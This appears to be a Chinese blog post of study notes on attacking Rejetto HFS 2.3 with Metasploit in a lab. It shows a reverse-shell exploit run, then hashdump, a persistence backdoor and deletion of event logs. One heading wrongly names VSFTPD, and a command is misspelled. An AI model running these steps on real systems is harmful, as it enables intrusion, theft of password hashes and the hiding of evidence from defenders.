前言
针对HFS 2.3漏洞进行渗透测试提权(HFS:HttpFileServer)
一、Metasploit中使用数据库
开启步骤
root@kali:~# service postgresql start
root@kali:~# msfdb init
msfdb ini 初始化数据库
- 使用msfconsole启动metasploit
- 输入db_status检查数据库连接状态,下图为连接成功
msf6 > db_status
[*] Connected to msf. Connection type: postgresql.
msf6 > Interrupt: use the 'exit' command to quit
msf6 >
利用msf中nmap扫描,发现hfs漏洞
二、VSFTPD2.3.4渗透攻击
1.威胁建模
利用use选择该渗透模块,在用options列出参数
msf6 > search hfs
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/git_client_command_exec 2014-12-18 excellent No Malicious Git and Mercurial HTTP Server For CVE-2014-9390
1 exploit/windows/http/rejetto_hfs_exec 2014-09-11 excellent Yes Rejetto HttpFileServer Remote Command Execution
Interact with a module by name or index. For example info 1, use 1 or use exploit/windows/http/rejetto_hfs_exec
msf6 > use 1
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/rejetto_hfs_exec) > options
Module options (exploit/windows/http/rejetto_hfs_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
HTTPDELAY 10 no Seconds to wait before terminating web server
Proxies no A proxy chain of format type:host:port[,type:host:port]
[...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts fil
e with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This
must be an address on the local machine or 0.0.0.0 to l
isten on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly g
enerated)
TARGETURI / yes The path of the web application
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none
)
LHOST 192.168.1.113 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(windows/http/rejetto_hfs_exec) > set rhosts 192.168.1.105
rhosts => 192.168.1.105
msf6 exploit(windows/http/rejetto_hfs_exec) > set rport 8080
rport => 8080
2.攻击
exploit进行攻击,虽然攻击成功但是无法显示会话,本人试了很多次没有找到原因
msf6 exploit(windows/http/rejetto_hfs_exec) > exploit
[*] Started reverse TCP handler on 192.168.1.113:4444
[*] Using URL: http://0.0.0.0:8080/CeeoHsoKnTH0oyJ
[*] Local IP: http://192.168.1.113:8080/CeeoHsoKnTH0oyJ
[*] Server started.
[*] Sending a malicious request to /
/usr/share/metasploit-framework/modules/exploits/windows/http/rejetto_hfs_exec.rb:110: warning: URI.escape is obsolete
/usr/share/metasploit-framework/modules/exploits/windows/http/rejetto_hfs_exec.rb:110: warning: URI.escape is obsolete
[*] Server stopped.
[!] This exploit may require manual cleanup of '%TEMP%\ciBBfVI.vbs' on the target
[*] Exploit completed, but no session was created.
msf6 exploit(windows/http/rejetto_hfs_exec) >
3.渗透持久化
修改metasploit驻留的进程号
meterpreter > geruid #查看驻留进程号
meterpreter > ps #列出进程号
meterpreter > migrate 1864 #修改进程号,explorer.exe
meterpreter > hashdump #查看系统密码哈希值
控制持久化,使用persistence模块,对目标渗透主机上传一个恶意文件
meterpreter > run persistence
建立一个handler连接被控端
msf6 > use exploit/multi/handler
用set修改参数,再用exploit攻击,等待被控端启动
4.清楚渗透痕迹
meterpreter > run event_manager -i #查看日志
meterpreter > run event_manager -c #删除日志
总结
本文简单介绍了hfs 2.3后门漏洞的渗透攻击以及提权,本人也在学习当中,仅供参考,作为学习笔记使用,欢迎一起讨论。
297
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
